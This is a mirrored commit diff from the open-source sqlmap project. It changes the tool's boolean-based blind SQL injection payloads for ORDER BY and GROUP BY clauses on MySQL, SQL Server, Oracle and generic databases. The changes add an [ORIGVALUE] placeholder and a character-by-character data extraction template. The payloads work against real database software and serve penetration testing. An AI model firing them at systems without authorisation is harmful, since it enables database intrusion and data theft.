mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-10 08:21:39 +00:00
On the way to get full support for injection on ORDER BY and GROUP BY clauses
This commit is contained in:
Bernardo Damele
@@ -436,7 +436,7 @@ Formats:
|
|||||||
|
|
||||||
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -444,10 +444,10 @@ Formats:
|
|||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
@@ -456,7 +456,7 @@ Formats:
|
|||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -464,10 +464,10 @@ Formats:
|
|||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
@@ -475,7 +475,7 @@ Formats:
|
|||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
|
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -483,10 +483,10 @@ Formats:
|
|||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
@@ -494,7 +494,7 @@ Formats:
|
|||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle boolean-based blind - ORDER BY clause</title>
|
<title>Oracle boolean-based blind - ORDER BY clause (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -502,10 +502,10 @@ Formats:
|
|||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
@@ -515,7 +515,7 @@ Formats:
|
|||||||
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
||||||
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
||||||
<test>
|
<test>
|
||||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -523,26 +523,26 @@ Formats:
|
|||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
@@ -551,7 +551,7 @@ Formats:
|
|||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>5</level>
|
<level>5</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -559,10 +559,10 @@ Formats:
|
|||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
@@ -570,7 +570,7 @@ Formats:
|
|||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
|
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -578,10 +578,10 @@ Formats:
|
|||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
@@ -589,7 +589,7 @@ Formats:
|
|||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle boolean-based blind - ORDER BY clause</title>
|
<title>Oracle boolean-based blind - ORDER BY clause (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -597,10 +597,10 @@ Formats:
|
|||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
@@ -610,7 +610,7 @@ Formats:
|
|||||||
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
||||||
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
||||||
<test>
|
<test>
|
||||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
@@ -618,10 +618,10 @@ Formats:
|
|||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
</test>
|
</test>
|
||||||
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
|
|||||||
Reference in New Issue
Block a user